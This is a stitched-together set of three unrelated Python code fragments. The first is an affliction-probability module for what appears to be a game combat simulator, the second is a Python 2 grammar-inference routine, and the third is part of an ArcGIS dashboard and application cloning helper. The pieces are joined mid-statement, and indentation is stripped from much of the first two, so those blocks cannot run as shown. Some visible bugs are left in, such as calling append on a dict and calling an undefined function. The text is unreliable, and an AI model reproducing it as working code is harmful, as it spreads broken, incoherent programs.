        # NOTE(review): unlike dot_end_proc this does not clear self.active,
        # so get() keeps reporting active and on() keeps failing afterwards —
        # confirm whether that is intentional.
        self.tick_timer.off()
        self.dotend_timer.off()
        log('dot', self.name, 'end by other reason')
class AfflicUncapped(object):
    """
    Affliction with no stack cap (used for damaging afflictions).

    Models application success probabilistically: ``self.states`` maps a
    resistance value -> probability the target currently has that resistance,
    and ``self.stacks`` holds the success probability of each still-running
    application.  get() reports P(at least one stack active).
    """
    def __init__(self, name=None):
        self.name = name
        self.resist = 0  # base resist; values > 1 are interpreted as percent
        self.rate = 1  # application rate; values > 2 are interpreted as percent
        self.tolerance = 0.2  # resist gained per successful application
        self.duration = 12
        self.states = None  # lazily initialized resistance distribution
        self.stacks = []  # success probability of each live stack
        self._get = 0.0  # cached P(at least one stack active)
        self.c_uptime = (0, 0)  # (cumulative uptime integral, last sample time)
        self.last_afflict = 0
        Timer(self.uptime, repeat=1).on(1)  # sample uptime once per second
    def get_tolerance(self):
        # Normalize percent-style values (e.g. 5 -> 0.05).
        if self.tolerance > 1:
            return float(self.tolerance) / 100.0
        else:
            return self.tolerance
    def get_rate(self):
        # Normalize percent-style values; rates up to 2 (200%) stay fractional.
        if self.rate > 2:
            return float(self.rate) / 100.0
        else:
            return self.rate
    def get_resist(self):
        # Normalize percent-style values (e.g. 80 -> 0.80).
        if self.resist > 1:
            return float(self.resist) / 100.0
        else:
            return self.resist
    def get(self):
        # Probability that at least one stack is currently active.
        return self._get
    def update(self):
        # P(any stack active) = 1 - prod(1 - P(stack_i active)).
        nostack_p = 1.0
        for stack_p in self.stacks:
            nostack_p *= 1.0 - stack_p
        self._get = 1.0 - nostack_p
    def stack_end_fun(self, p):
        # Build the timer callback that retires stack probability `p` on expiry.
        def end_callback(t):
            self.stacks.remove(p)
            self.update()
        return end_callback
    def __call__(self, *args, **argv):
        return self.on(*args, **argv)
    def on(self):
        """Attempt one application; returns the overall success probability."""
        self.resist = self.get_resist()
        self.rate = self.get_rate()
        self.tolerance = self.get_tolerance()
        if self.states is None:
            # Start with all probability mass on the base resistance.
            self.states = defaultdict(lambda: 0.0)
            self.states[self.resist] = 1.0
        states = defaultdict(lambda: 0.0)
        total_success_p = 0.0
        for res, state_p in self.states.items():
            if res >= self.rate or res >= 1:
                # Guaranteed resist: probability mass stays where it is.
                states[res] += state_p
            else:
                rate_after_res = min(1.0, self.rate - res)
                success_p = state_p * rate_after_res
                fail_p = state_p * (1.0 - rate_after_res)
                total_success_p += success_p
                # A success bumps the target's resistance by the tolerance step.
                states[res + self.tolerance] += success_p
                states[res] += fail_p
        self.states = states
        self.stacks.append(total_success_p)
        Timer(self.stack_end_fun(total_success_p), self.duration).on()
        self.update()
        return total_success_p
    def uptime(self, t):
        # Integrate P(active) over time; log the uptime ratio once per minute.
        next_r = self.get()
        next_t = now()
        if next_r == 0:
            self.last_afflict = next_t
        prev_r, prev_t = self.c_uptime
        rate = prev_r + next_r*(next_t-prev_t)
        self.c_uptime = (rate, next_t)
        if next_t > 0 and rate > 0 and next_t % 60 == 0:
            log('{}_uptime'.format(self.name), '{:.2f}/{:.2f}'.format(rate, next_t), '{:.2%}'.format(rate/next_t))
class AfflicCapped(object):
    """
    Affliction with a maximum number of simultaneous stacks (crowd control).

    ``self.states`` maps a State(timers, resist) namedtuple -> probability the
    target is in that state, where ``timers`` is the frozenset of still-running
    stack timers and ``resist`` the accumulated resistance.  get() reports
    P(at least one stack active).
    """
    # timers: frozenset of live stack Timers; resist: accumulated resistance.
    State = namedtuple("State", "timers resist")
    def __init__(self, name=None, duration=12):
        self.name = name
        self.resist = 0  # base resist; values > 1 are interpreted as percent
        self.rate = 1  # application rate; values > 2 are interpreted as percent
        self.tolerance = 0.2  # resist gained per successful application
        self.default_duration = duration
        self.duration = duration
        self.stack_cap = 1  # maximum simultaneous stacks per state
        self.states = None  # lazily initialized state distribution
        self._get = 0.0  # cached P(at least one stack active)
        self.c_uptime = (0, 0)  # (cumulative uptime integral, last sample time)
        self.last_afflict = 0
        Timer(self.uptime, repeat=1).on(1)  # sample uptime once per second
    def get_tolerance(self):
        # Normalize percent-style values (e.g. 20 -> 0.20).
        if self.tolerance > 1:
            return float(self.tolerance) / 100.0
        else:
            return self.tolerance
    def get_rate(self):
        # Normalize percent-style values; rates up to 2 (200%) stay fractional.
        if self.rate > 2:
            return float(self.rate) / 100.0
        else:
            return self.rate
    def get_resist(self):
        # Normalize percent-style values (e.g. 80 -> 0.80).
        if self.resist > 1:
            return float(self.resist) / 100.0
        else:
            return self.resist
    def get(self):
        # Probability that at least one stack is currently active.
        return self._get
    def update(self):
        """Drop expired timers from every state; returns P(any stack active)."""
        total_p = 0.0
        states = defaultdict(lambda: 0.0)
        for state, state_p in self.states.items():
            reduced_state = self.State(frozenset([t for t in state.timers if t.timing > now()]), state.resist)
            states[reduced_state] += state_p
            if reduced_state.timers:
                total_p += state_p
        self.states = states
        self._get = total_p
        return total_p
    def stack_end(self, t):
        # Timer callback: recompute the distribution once a stack expires.
        self.update()
    def __call__(self, *args, **argv):
        return self.on(*args, **argv)
    def on(self):
        """Attempt one application; returns the overall success probability."""
        self.resist = self.get_resist()
        self.rate = self.get_rate()
        self.tolerance = self.get_tolerance()
        # One shared timer represents this application in every success state.
        timer = Timer(self.stack_end, self.duration).on()
        if self.states is None:
            # Start with all probability mass on the base resistance, no stacks.
            self.states = defaultdict(lambda: 0.0)
            self.states[self.State(frozenset(), self.resist)] = 1.0
        states = defaultdict(lambda: 0.0)
        total_p = 0.0
        for start_state, start_state_p in self.states.items():
            res = start_state.resist
            if res >= self.rate or res >= 1 or len(start_state.timers) >= self.stack_cap:
                # Guaranteed resist (or stack cap reached): mass is unchanged.
                states[start_state] += start_state_p
            else:
                rate_after_res = min(1, self.rate - res)
                succeed_timers = frozenset(list(start_state.timers) + [timer])
                state_on_succeed = self.State(succeed_timers, min(1.0, res + self.tolerance))
                overall_succeed_p = start_state_p * rate_after_res
                overall_fail_p = start_state_p * (1.0 - rate_after_res)
                total_p += overall_succeed_p
                states[state_on_succeed] += overall_succeed_p
                if overall_fail_p > 0:
                    states[start_state] += overall_fail_p
        self.states = states
        self.update()
        return total_p
    def uptime(self, t):
        # Integrate P(active) over time; log the uptime ratio once per minute.
        next_r = self.get()
        next_t = now()
        if next_r == 0:
            self.last_afflict = next_t
        prev_r, prev_t = self.c_uptime
        rate = prev_r + next_r*(next_t-prev_t)
        self.c_uptime = (rate, next_t)
        if next_t > 0 and rate > 0 and next_t % 60 == 0:
            log('{}_uptime'.format(self.name), '{:.2f}/{:.2f}'.format(rate, next_t), '{:.2%}'.format(rate/next_t))
class Afflic_dot(AfflicUncapped):
    """Uncapped affliction that also deals damage over time (poison, burn, ...)."""
    def __init__(self, name=None, duration=12, iv=3.99):
        super().__init__(name)
        self.coef = 0.97  # placeholder coefficient; overwritten on every on()
        self.default_duration = duration
        self.duration = duration
        self.default_iv = iv
        self.iv = iv
    def on(self, name, rate, coef, duration=None, iv=None, dtype=None):
        """Apply the affliction and spawn its dot; returns the success probability."""
        self.rate = rate
        self.coef = coef
        self.dtype = dtype
        self.duration = duration if duration else self.default_duration
        self.iv = iv if iv else self.default_iv
        dot = Dot('o_%s_%s' % (name, self.name), coef, self.duration, self.iv, self.dtype)
        dot.on()
        success_p = super().on()
        # Scale tick damage by the probability that the application landed.
        dot.tick_dmg *= success_p
        return success_p
class Afflic_cc(AfflicCapped):
    """Hard crowd control (freeze/stun/sleep): a single capped stack."""
    def __init__(self, name=None, duration=6.5):
        super().__init__(name, duration)
        self.stack_cap = 1
    def on(self, name, rate, duration=None):
        """Apply the cc; returns the overall success probability."""
        self.rate = rate
        self.duration = duration if duration else self.default_duration
        return super().on()
    def cb_end(self):
        # No special end-of-effect handling for plain cc.
        pass
class Afflic_scc(AfflicCapped):
    """Soft crowd control (e.g. blind): a single capped stack, longer default."""
    def __init__(self, name=None, duration=8):
        super().__init__(name, duration)
        self.stack_cap = 1
    def on(self, name, rate, duration=None):
        """Apply the soft cc; returns the overall success probability."""
        self.rate = rate
        self.duration = duration if duration else self.default_duration
        return super().on()
    def cb_end(self):
        # No special end-of-effect handling for soft cc.
        pass
class Afflic_bog(Afflic_scc):
    """Bog: soft cc that additionally applies an 'att' debuff on success."""
    def on(self, name, rate, duration=None):
        success_p = super().on(name, rate, duration)
        if success_p:
            # Local import to avoid a circular dependency with core.advbase.
            from core.advbase import Debuff
            Debuff('{}_bog'.format(name), -0.5 * success_p, self.duration, 1, 'att', 'bog').on()
        return success_p
class Afflics(object):
def __init__(self):
self.rinit()
self.poison = Afflic_dot('poison', duration=15, iv=2.99)
self.burn = Afflic_dot('burn', duration=12, iv=3.99)
self.paralysis = Afflic_dot('paralysis', duration=13, iv=3.99)
self.frostbite = Afflic_dot('frostbite', duration=21, iv=2.99)
self.blind = Afflic_scc('blind', duration=8)
self.bog = Afflic_bog('bog', duration=8)
self.freeze = Afflic_cc('freeze', duration=4.5)
self.stun = Afflic_cc('stun', duration=6.5)
self.sleep = Afflic_cc('sleep', duration=6.5)
self.poison.resist = 0
self.burn.resist = 0
self.paralysis.resist = 0
self.blind.resist = 80
self.bog.resist = 100
self.freeze.resist = 80
self.stun.resist = 80
self.sleep.resist = 80
self.frostbite.resist = 0
self.poison.tolerance = 5
self.burn.tolerance = 5
self.paralysis.tolerance = 5
self.blind.tolerance = 10
self.bog.tolerance = 20
self.freeze.tolerance = 20
self.stun.tolerance = 20
self.sleep.tolerance = 20
self.frostbite.tolerance = 5
def add(self, name, atype, rate, duration, coef=0, iv=0):
if atype == 'burning':
atype = 'burn'
if atype == 'para':
atype = 'paralysis'
if atype in ['poison', 'burn', 'paralysis']:
return self.add_dot(name, atype, rate, coef, duration, iv)
elif atype in ['blind', 'freeze', 'stun', 'sleep', 'bog']:
return self.add_cc(name, atype, rate, coef, duration, iv)
def get(self, atype):
if atype in ['poison', 'burn', 'paralysis']:
stack = 0
for i in self.dot:
if i[0] == atype and i[1].get():
stack += 1
return stack
elif atype in ['blind', 'freeze', 'stun', 'sleep', 'bog']:
if atype in self.cc:
return self.cc[atype].get()
    def r(self):
        """Roll a uniform random number in [0, 1), scaled down by self.luck."""
        return random.random() / self.luck
def refresh_dot(self):
tmp = []
for i in self.dot:
if i[1].get():
tmp.append(i)
self.dot = tmp
def refresh_cc(self):
tmp = {}
for i in self.cc:
if self.cc[i].get():
tmp.append(i)
self.cc = tmp
def add_dot(self, name, atype, rate, coef, duration, iv):
if not iv:
errrrrr()
if self.resist[atype] < 100:
r = self.r()
log('afflic', rate, self.resist[atype], r * 100)
if rate < self.resist[atype]:
return 0
if r * 100 < (rate - self.resist[atype]):
log('afflic', 'succ', name, atype)
self.refresh_dot()
dot = Dot('o_' + name + '_' + atype, coef, duration, iv)
dot.on()
self.dot.append((atype, dot))
self.resist[atype] += 20 # 5
return 1
else:
log('afflic', 'perfect_resist')
return 0
    def add_cc(self, name, atype, rate, coef, duration, iv):
        """Attempt to apply a crowd-control affliction (legacy dict-based API).

        Returns 1 on success, 0 on resist or refresh; ``coef`` and ``iv`` are
        accepted for signature parity with add_dot but are unused.  Note the
        failed-roll path falls through and implicitly returns None (falsy).
        """
        if self.resist[atype] < 100:
            r = self.r()
            log('afflic', rate, self.resist[atype], r * 100)
            if atype in self.cc:
                # Already active: re-trigger the existing effect instead.
                self.cc[atype].on()
                return 0
            elif rate < self.resist[atype]:
                return 0
            elif r * 100 < (rate - self.resist[atype]):
                log('afflic', 'succ', name, atype)
                self.refresh_cc()
                # Zero-coef Dot used purely as a duration timer for the cc.
                cc = Dot('o_' + name + '_' + atype, 0, duration, duration + 0.01)
                cc.on()
                self.cc[atype] = cc
                if atype == 'blind':
                    self.resist[atype] += 20  # 10
                else:  # elif atype in ['freeze','stun','sleep','bog']:
                    self.resist[atype] += 20
                return 1
        else:
            log('afflic', 'perfect_resist')
            return 0
def get_uptimes(self):
uptimes = {}
# for atype in ['poison', 'burn', 'paralysis', 'blind', 'freeze', 'stun', 'sleep', 'bog']:
for atype in AFFLICT_LIST:
aff = self.__dict__[atype]
rate, t = aff.c_uptime
# last = aff.last_afflict
| |
t in newTargetsInt:
#create a graph
G = nx.DiGraph()
edgeLabels = {} #used for saving non-terminals
G.add_nodes_from([0, len(t)+1])
for i in range(len(t)):
G.add_edge(i, i+1)
edgeLabels[(i,i+1)] = -1
# print 'ntYields.keys()', ntYields.keys()
# print 't', t
for nt in ntYields:
newEdgesStarts = KnuthMorrisPratt(t, ntYields[nt][0])
# print 't', t
# print 'ntYields[nt]', nt, ntYields[nt][0]
# print 'newEdgesStarts', newEdgesStarts
for s in newEdgesStarts:
G.add_edge(s, s+len(ntYields[nt][0]))
edgeLabels[(s, s+len(ntYields[nt][0]))] = nt
# paths = nx.shortest_path(G, source=0, target=len(t), weight=None)
shortestPaths = nx.all_shortest_paths(G, source=0, target=len(t), weight=None)
shortestPaths = [p for p in shortestPaths]
shortestPaths = [shortestPaths[0]]
# if len(shortestPaths) >= 2:
# print 'YES'
newParsedTargets.append([])
for paths in shortestPaths:
## sys.stderr.write(str(paths) + 'paths\n')
## paths = random.choice(list(nx.all_simple_paths(G, source=0, target=len(t))))
## ctr = 1
# for p in nx.all_simple_paths(G, source=0, target=len(t)):
# paths = p
## sys.stderr.write(str(ctr) + '\n')
## ctr += 1
# break
# sys.stderr.write(str(list(nx.all_simple_paths(G, source=0, target=len(t)))) + 'paths\n')
# sys.exit()
#all shortest paths
# print 'edgeLabels', edgeLabels
# print 'edges', G.edges()
# print 'paths', paths
# for i in range(len(paths[0])):
optimalParsing = []
for i in range(len(paths)-1):
if edgeLabels[(paths[i], paths[i + 1])] == -1:
# print t[paths[i]],
optimalParsing.append(t[paths[i]])
else:
# print edgeLabels[(paths[i],paths[i+1])],
optimalParsing.append(edgeLabels[(paths[i],paths[i+1])])
countingNumberOfOptimalParsings_Recombination += 1
# print
# sys.exit()
# if len(t) > len(optimalParsing):
# print 'yaaaaaaaaaaay1'
optimallyParsedTargetInts.append(optimalParsing)
# newParsedTargets.append(optimalParsing)
newParsedTargets[-1].append(optimalParsing)
# if len(newParsedTargets[-1]) >= 2:
# print 'YES'
ratios.append(float(len(optimalParsing))/len(t))
optimalParsingCombinations = list(itertools.product(*newParsedTargets))
# print 'combs'
# print optimalParsingCombinations
previousCost = g.grammarCost(CostFunction.EdgeCost)
originalCost = previousCost
for t in newTargetsInt:
originalCost += len(t)
intermediateCost = previousCost
optCost = 0
for s in optimallyParsedTargetInts:
intermediateCost += len(s)
optCost += len(s)
# print str(intermediateCost) + '\t',
# add newly parsed targets to grammar and convert grammardic to new grammar
# for t in optimallyParsedTargetInts:
# grammarDic[0].append(t)
# sys.stderr.write(str(x) + ' 2\n')
previousDic = g.dic
minCost = totalLengthNewTargets
minParsing = []
for optimallyParsedTargetInts in optimalParsingCombinations:
# print optimallyParsedTargetInts
g = None
tmpOut = open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'w')
for t in optimallyParsedTargetInts:
for c in t:
tmpOut.write(str(c) + ' ')
tmpOut.write('\n')
tmpOut.close()
g = Grammar(open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'r'), 'file', gap, chFlag, noNewLineFlag)
# os.remove('tmpOut.txt')
g.gSGP(aFlag, fFlag, quietLog, rFlag, cFlag, functionFlag, pairFlag)
# if previousCost + g.grammarCost(CostFunction.EdgeCost) < intermediateCost:
# print 'yaaaaaaaaaaay2',
# sys.stderr.write(str(x) + ' 22\n')
# g.printGrammarWithOffsetToNTs(printIntsGrammar, maxInt, inputDic=previousDic)
# g = Grammar(open('tmpGram.txt', 'r'), 'grammar', gap, chFlag, noNewLineFlag)
# if len(optimalParsingCombinations) >= 2:
# print 'minCost\t' + str(g.grammarCost(CostFunction.EdgeCost))
if minCost >= g.grammarCost(CostFunction.EdgeCost):
# if minCost != totalLengthNewTargets:
# print 'diff' + '\t' + str(minCost) + '\t' + str(g.grammarCost(CostFunction.EdgeCost))
minCost = g.grammarCost(CostFunction.EdgeCost)
minParsing = optimallyParsedTargetInts
if firstChoice:
break
g = None
total_length_new_target_set_after_parsing = 0
tmpOut = open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'w')
for t in minParsing:
total_length_new_target_set_after_parsing += len(t)
for c in t:
tmpOut.write(str(c) + ' ')
tmpOut.write('\n')
tmpOut.close()
# print 'tttttttttt', total_length_new_target_set_after_parsing
g = Grammar(open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'r'), 'file', gap, chFlag, noNewLineFlag)
# os.remove('tmpOut.txt')
g.gSGP(aFlag, fFlag, quietLog, rFlag, cFlag, functionFlag, pairFlag)
# g.printGrammarToFile(sys_args[-1] + "incGlex_" + str(x)+'.txt', printIntsGrammar)
newGrammarDic = g.grammarDic()
# print newGrammarDic
maxIntChar = -1
for nt in grammarDic:
for rule in grammarDic[nt]:
for c in rule:
if maxIntChar < int(c):
maxIntChar = int(c)
maxIntChar += 2
newNts = {}
for nt in sorted(newGrammarDic.keys()):
# if nt in grammarDic:
if nt != 0:
newNts[nt] = nt + maxIntChar
maxIntChar += 2
tmpNewGrammarDic = {}
for nt in newGrammarDic:
tmpRHS = []
# if nt == 0:
for rule in newGrammarDic[nt]:
# print rule
tmpRRHS = []
for c in rule:
# if c == 1507:
# print 'wowowow', newGrammarDic[1507]
if c in g.dic:
tmpRRHS.append(int(g.dic[c]))
else:
if c in newNts:
tmpRRHS.append(int(newNts[c]))
else:
tmpRRHS.append(int(c))
if nt!=0:
if tmpRRHS[0] == newNts[nt]:
print 'damn!'
print nt
print tmpRRHS
print rule
print newGrammarDic[nt]
tmpRHS.append(tmpRRHS)
# else:
# for c in newGrammarDic[nt]:
# print c
# if c in g.dic:
# tmpRHS.append(int(g.dic[c]))
# else:
# tmpRHS.append(int(c))Q
if nt in newNts:
tmpNewGrammarDic[newNts[nt]] = tmpRHS
else:
newGrammarDic[nt] = tmpRHS
for nt in newNts:
newGrammarDic.pop(nt)
for nt in tmpNewGrammarDic:
newGrammarDic[nt] = tmpNewGrammarDic[nt]
# print newGrammarDic
# print grammarDic
for nt in newGrammarDic:
if nt in grammarDic:
if nt == 0:
grammarDic[nt].extend(newGrammarDic[nt])
else:
# print nt, newGrammarDic[nt]
# grammarDic[nt + maxIntChar] = newGrammarDic[nt]
# print 1, nt + maxIntChar
# print 3, grammarDic[1507]
# maxIntChar += 2
print 'error'
sys.exit(0)
else:
# print nt, newGrammarDic[nt]
grammarDic[nt] = newGrammarDic[nt]
# grammarDic[nt + maxIntChar] = newGrammarDic[nt]
# print 2, nt + maxIntChar
# print 4, grammarDic[1507]
# maxIntChar += 2
# sys.stderr.write(str(x) + ' 3\n')
g.initFromGrammarDic(grammarDic, previousDic)
# break
# while True:
# maxR = g.retreiveMaximumGainRepeat(rFlag, CostFunction.EdgeCost)
# if maxR['score'] == -1:
# break
# else:
# # print '\tmaxR'
# sys.stderr.write(str(maxR) + '\n')
# g.replaceRepeat(maxR['length'], maxR['occs'])
# g.printGrammar(printIntsGrammar)
# print countingNumberOfOptimalParsings_Recombination
if len(tmp_dataset) - prev_len_tmp_dataset > data_increment * float(LEN_MAIN):
lengthPer = str(int(math.floor((float(len(tmp_dataset)) / float(LEN_MAIN)) * 100)))
# print len(tmp_dataset), LEN_MAIN, lengthPer
###print 'Length %', lengthPer
###g.printGrammarToFile(folder + fileName + '-' + lengthPer, printIntsGrammar)
prev_len_tmp_dataset = len(tmp_dataset)
###g.printGrammarToFile(folder + fileName + '-100.txt', printIntsGrammar)
return g
# print
# print str(originalCost) + '\t' + str(intermediateCost) + '\t' + str(g.grammarCost(CostFunction.EdgeCost)) + '\t' + str(g.grammarCost(CostFunction.EdgeCost)-previousCost) + '\t' + str(totalLengthNewTargets) + '\t' + str(totalLength)
# g.printGrammarToFile(sys_args[-1]+str(x/batchSize+1)+'.txt', printIntsGrammar)
# print str(g.grammarCost(CostFunction.EdgeCost)) + '\t' + str(totalLengthNewTargets) + '\t' + str(totalLength)
# print str(g.grammarCost(CostFunction.EdgeCost)) + '\t' + str(g.grammarCost(CostFunction.EdgeCost)-previousCost) + '\t' + str(totalLengthNewTargets) + '\t' + str(totalLength)
# g.printGrammarToFile(sys_args[-1]+'gram'+str(numData)+'.txt', printIntsGrammar)
# g.printGrammarToFile('tmpGram.txt', printIntsGrammar)
# sys.stderr.write(str(numData) + '\n')
# try:
# print str(totalLength) + '\t' + str(totalLengthNewTargets) + '\t' + str(intermediateCost-previousCost) + '\t' + str(totalLengthNewTargets-(intermediateCost-previousCost)) + '\t' + str((intermediateCost-previousCost)-(intermediateCost-g.grammarCost(CostFunction.EdgeCost))) + '\t' + str(intermediateCost-g.grammarCost(CostFunction.EdgeCost)) + '\t' + str(g.grammarCost(CostFunction.EdgeCost))\
# + '\t' + str(structSimTest(open('tmpGram.txt','r').read(),\
# open('/Users/payamsiyari/Desktop/inc/inc-fullProfile/clean-slate full profile/gram' + str(numData) + '.txt','r').read()))
# except:
# pass
# previousDic = g.dic
# g = None
# tmpOut = open('tmpOut.txt','w')
# for t in newParsedTargets:
# for c in t:
# tmpOut.write(str(c) + ' ')
# tmpOut.write('\n')
# tmpOut.close()
# g = Grammar(open('tmpOut.txt', 'r'), 'file', gap, chFlag, noNewLineFlag)
# g.gSGP(aFlag, fFlag, quietLog, rFlag, cFlag, functionFlag, pairFlag)
# g.printGrammarWithOffsetToNTs(printIntsGrammar, maxInt, inputDic=previousDic)
# g.printGrammarToFile(sys_args[-1]+'.txt', printIntsGrammar)
#Only for target ratio testing
# sumNewLengths = 0
# for t in optimallyParsedTargetInts:
# sumNewLengths += len(t)
# return sumNewLengths
return ratios
def idea3_Fixed_TGM4_Glexis(input_file_path, givenGrammar=None, batchSize=10, init=.05, gap=50, chFlag=SequenceType.SpaceSeparated, noNewLineFlag=True, working_path = ''):
folder = '/'.join(input_file_path.split('/')[:-1]) + '/INC-DAGs/inc-b'+str(batchSize)+'/'
# folder = 'TBTG/NewData3/Data/INC-DAGs'
# if not os.path.exists(folder):
# os.makedirs(folder)
fileName = input_file_path.split('/')[-1].split('.')[0]
firstChoice = True
mainFile = open(input_file_path, 'r').read().splitlines()
LEN_MAIN = len(mainFile)
# data_increment = 0.1
data_increment = float(batchSize) / LEN_MAIN
counter = 0
initData = []
for l in mainFile:
if counter < init*LEN_MAIN:
initData.append(mainFile.pop(0))
else:
break
counter += 1
tmpOut = open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'w')
for l in initData:
tmpOut.write(l + '\n')
tmpOut.close()
aFlag = False;fFlag = False;chFlag = SequenceType.SpaceSeparated;printIntsGrammar = False;quietLog = True;
rFlag = 'mr';cFlag = 'mr';pairFlag = 'c';functionFlag = 'r';noNewLineFlag = False;loadGrammarFlag = False;
gap = 50
if givenGrammar == None:
g = Grammar(open(working_path + '/tmpOut-'+str(batchSize) + fileName + '--.txt', 'r'), 'file', gap, chFlag, noNewLineFlag)
# totalLength = open('tmpOut-'+str(batchSize) + fileName + '--.txt', 'r').read().count(' ')
# numData = open('tmpOut-'+str(batchSize) + fileName + '--.txt', 'r').read().count('\n')
# totalLength = 1496
reverseDic = {}
maxInt = -1
for c in g.dic:
if maxInt < c:
maxInt = c + 2
reverseDic[g.dic[c]] = c
g.gSGP(aFlag, fFlag, quietLog, rFlag, cFlag, functionFlag, pairFlag)
###g.printGrammarToFile(folder + fileName + '-0.txt',printIntsGrammar)
seedCost = g.grammarCost(CostFunction.EdgeCost)
# output = open('tmpGram.txt', 'w')
# output.write('\n')
# output.close()
# g.printGrammarWithOffsetToNTs(printIntsGrammar, 0)
# g.printGrammar(printIntsGrammar)
# return
# allNewTargets = open(sys_args[-2], 'r').read().splitlines()
allNewTargets = mainFile
else:
g = Grammar(open(givenGrammar, 'r'), 'grammar', gap, chFlag, noNewLineFlag)
reverseDic = {}
maxInt = -1
for c in g.dic:
if maxInt < c:
maxInt = c + 2
reverseDic[g.dic[c]] = c
allNewTargets = open(input_file_path, 'r').read().splitlines()
LEN = len(allNewTargets)
ratios = []
newParsedTargets = []
ntYields = {}
countingNumberOfOptimalParsings_Recombination = 0
countingNumberOfGlexises_Innovation = 0
tmp_dataset = []
prev_len_tmp_dataset = 0
remaining_batch_targets = []
for x in range(0, len(allNewTargets), | |
clone_mapping['Item IDs'][dataset["dataSource"]["itemId"]]
if "headerPanel" in app_json and "selectors" in app_json["headerPanel"]:
for selector in app_json["headerPanel"]["selectors"]:
if "datasets" in selector:
for dataset in selector["datasets"]:
if "dataSource" in dataset and "itemId" in dataset["dataSource"]:
# in some cases the layer ids may have changed when cloning
# so we can use a mapping between the old and new to update it
for url, cloned_service in clone_mapping['Services'].items():
if cloned_service['id'] == clone_mapping['Item IDs'][dataset["dataSource"]["itemId"]]:
# update the layer id
dataset["dataSource"]["layerId"] = cloned_service['layer_id_mapping'][dataset["dataSource"]["layerId"]]
# update the item id
dataset["dataSource"]["itemId"] = clone_mapping['Item IDs'][dataset["dataSource"]["itemId"]]
if "leftPanel" in app_json and "selectors" in app_json["leftPanel"]:
for selector in app_json["leftPanel"]["selectors"]:
if "datasets" in selector:
for dataset in selector["datasets"]:
if "dataSource" in dataset and "itemId" in dataset["dataSource"]:
# in some cases the layer ids may have changed when cloning
# so we can use a mapping between the old and new to update it
for url, cloned_service in clone_mapping['Services'].items():
if cloned_service['id'] == clone_mapping['Item IDs'][dataset["dataSource"]["itemId"]]:
# update the layer id
dataset["dataSource"]["layerId"] = cloned_service['layer_id_mapping'][dataset["dataSource"]["layerId"]]
# update the item id
dataset["dataSource"]["itemId"] = clone_mapping['Item IDs'][dataset["dataSource"]["itemId"]]
return app_json
@staticmethod
def get_webmap_ids(data):
"""
Parses a dashboard based on version to return the list of webmap ids
:param data: The json/dict to parse
:return: A list of webmap ids
"""
if 'version' in data:
if data['version'] >= 24:
webmap_ids = _DashboardDefinition._get_webmap_ids_v24(data)
else:
raise _ItemCreateException("Dashboard version {} is not supported".format(data['version']))
else:
raise _ItemCreateException("Dashboard is not versioned and cannot be cloned")
return list(webmap_ids)
@staticmethod
def _get_webmap_ids_v24(data):
"""
Parses a dashboard at version 24 to find data webmap ids
:param data: The json/dict to parse
:return: A list of webmap ids
"""
webmap_ids = set()
if 'widgets' in data:
for widget in data['widgets']:
if widget['type'] == 'mapWidget':
if 'itemId' in widget:
webmap_ids.add(widget['itemId'])
return list(webmap_ids)
@staticmethod
def get_layer_ids(data):
"""
Parses a dashboard based on version to return the list of layer ids
:param data: The json/dict to parse
:return: A list of layer ids
"""
if 'version' in data:
if data['version'] >= 24:
layer_ids = _DashboardDefinition._get_layer_ids_v24(data)
else:
raise _ItemCreateException("Dashboard version {} is not supported".format(data['version']))
else:
raise _ItemCreateException("Dashboard is not versioned and cannot be cloned")
return list(layer_ids)
@staticmethod
def _get_layer_ids_v24(data):
"""
Parses a dashboard at version 24 to find layer/service ids
:param data: The json/dict to parse
:return: A list of layer ids
"""
layer_ids = set()
if "widgets" in data:
for widget in data["widgets"]:
if "datasets" in widget:
layer_ids = layer_ids.union(_DashboardDefinition.
_parse_datasets_v24(widget["datasets"]), layer_ids)
if "headerPanel" in data and "selectors" in data["headerPanel"]:
for selector in data["headerPanel"]["selectors"]:
if "datasets" in selector:
layer_ids = layer_ids.union(_DashboardDefinition.
_parse_datasets_v24(selector["datasets"]), layer_ids)
if "leftPanel" in data and "selectors" in data["leftPanel"]:
for selector in data["leftPanel"]["selectors"]:
if "datasets" in selector:
layer_ids = layer_ids.union(_DashboardDefinition.
_parse_datasets_v24(selector["datasets"]), layer_ids)
return layer_ids
@staticmethod
def _parse_datasets_v24(datasets):
"""
Parses a data set in a version 24 dashboard
:param datasets: the list of datasets
:return: A set of layer ids
"""
layer_ids = set()
for dataset in datasets:
# newer schema
if "dataSource" in dataset:
ds = dataset["dataSource"]
# newer property
if "itemId" in ds:
layer_ids.add(ds['itemId'])
return layer_ids
class _ApplicationDefinition(_TextItemDefinition):
    """
    Represents the definition of an application within ArcGIS Online or Portal.
    """

    def __init__(self, target, clone_mapping, info, source_app_title=None, update_url=True, data=None, sharing=None, thumbnail=None, portal_item=None, item_extent=None, folder=None, search_existing=True, owner=None):
        # source_app_title: title of the source configurable-app template item
        # update_url: when True, clone() re-points the item url at the new org / new item id
        super().__init__(target, clone_mapping, info, data, sharing, thumbnail, portal_item, folder, item_extent, search_existing, owner)
        self._source_app_title = source_app_title
        self._update_url = update_url

    @property
    def source_app_title(self):
        """Gets the title of the application"""
        return self._source_app_title

    @property
    def update_url(self):
        """Gets a value indicating if the application url should be updated"""
        return self._update_url

    def clone(self):
        """Clone the application in the target organization.

        Returns the new (or already-existing) item. On any failure raises
        _ItemCreateException carrying the partially created item, if any.
        """
        try:
            new_item = None
            original_item = self.info
            if self._search_existing:
                new_item = _search_org_for_existing_item(self.target, self.portal_item)
            if not new_item:
                org_url = _get_org_url(self.target)
                is_web_appbuilder = False
                # Get the item properties from the original application which will be applied when the new item is created
                item_properties = self._get_item_properties(self.item_extent)
                # Swizzle the item ids of the web maps, groups and URLs of defined in the application's data
                app_json = self.data
                if app_json is not None:
                    app_json_text = ''
                    # If item is a story map don't swizzle any of the json references
                    if 'Story Map' in original_item['typeKeywords'] or 'Story Maps' in original_item['typeKeywords']:
                        app_json_text = json.dumps(app_json)
                    else:
                        if "Web AppBuilder" in original_item['typeKeywords']: #Web AppBuilder
                            is_web_appbuilder = True
                            if 'portalUrl' in app_json:
                                app_json['portalUrl'] = org_url
                            if 'map' in app_json:
                                if 'portalUrl' in app_json['map']:
                                    app_json['map']['portalUrl'] = org_url
                                if 'itemId' in app_json['map']:
